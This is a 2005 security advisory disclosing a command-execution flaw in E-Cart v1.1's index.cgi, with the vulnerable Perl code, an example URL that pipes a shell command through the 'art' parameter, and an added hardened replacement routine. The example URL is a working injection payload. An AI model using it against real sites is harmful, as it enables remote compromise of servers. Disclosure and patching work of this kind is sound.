============================================================
Title: E-Cart v1.1 Remote Command Execution
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 20/04/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: <= E-Cart 2004 v1.1
Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi
============================================================

============================================================
*Summary
E-Cart is a mod for WebAPP, written in Perl. It is a web shop.
============================================================
*Problem Description:

The bug is in the file index.cgi, where the variable art is passed to
"open()" without any validation of its data, allowing an attacker to
execute arbitrary commands.

Vulnerable code
---------------
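sub viewart {
    &cartfooter;
    # Two-argument open(): the request parameters 'cat' and 'art' are
    # interpolated directly into the string that open() interprets.
    open(DATA, "$catdir/$info{'cat'}/$info{'art'}");
    hold(DATA);
    chomp(@data = <DATA>);
    release(DATA);
    close(DATA);
    ...
    ...
    ...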

============================================================

*Example:

http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a|

============================================================
*Fix:

Contact the Vendor.
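
Added example (not part of the original advisory and not E-Cart's own code):
one way to harden the file read in viewart while no vendor fix is available,
by validating both parameters against an allow-list and using three-argument
open(). The names read_article and $SAFE_COMPONENT, the allow-list pattern and
the temporary demo catalogue are assumptions made for this illustration.

```perl
#!/usr/bin/perl
# Added example, not E-Cart's code: hardened replacement for the file read
# in viewart. The application's hold()/release() locking calls are omitted.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Allow-list for a single path component: letters, digits, '_', '-' and '.',
# not starting with '.', at most 64 characters. \A and \z anchor the whole
# string, so '|', '/', whitespace and newlines can never pass.
my $SAFE_COMPONENT = qr/\A[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}\z/;

# Returns an array ref of the article's lines, or undef when a parameter is
# rejected or the file cannot be opened. $catdir is the trusted server-side
# catalogue root; $cat and $art are the untrusted request parameters.
sub read_article {
    my ($catdir, $cat, $art) = @_;
    for my $part ($cat, $art) {
        return unless defined $part && $part =~ $SAFE_COMPONENT;
    }
    my $path = File::Spec->catfile($catdir, $cat, $art);

    # Three-argument open with a fixed '<' mode: $path is only ever a file
    # name, so a trailing '|' is not interpreted as "run this command".
    open(my $fh, '<', $path) or return;
    chomp(my @data = <$fh>);
    close($fh);
    return \@data;
}

# Constructed demo data: a temporary catalogue holding one article file.
my $catdir = tempdir(CLEANUP => 1);
my $cat    = 'reproductores_dvd';
mkdir "$catdir/$cat" or die "mkdir: $!";
open(my $out, '>', "$catdir/$cat/reproductordvp-ns315.dat") or die "open: $!";
print {$out} "constructed sample article\n";
close($out);

# A normal request value, then the value from the advisory's example URL.
for my $art ('reproductordvp-ns315.dat', 'reproductordvp-ns315.dat|uname -a|') {
    my $data = read_article($catdir, $cat, $art);
    printf "%-36s %s\n", $art, defined $data ? 'read' : 'rejected';
}
```

Either control alone closes this bug; keeping both means a later change to the pattern or to the open() call does not reopen it.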
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar



--
Iñaki Cormenzana
SoulBlack`s Staff
Y3VhbmRvIHRlbmVtb3MgZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=
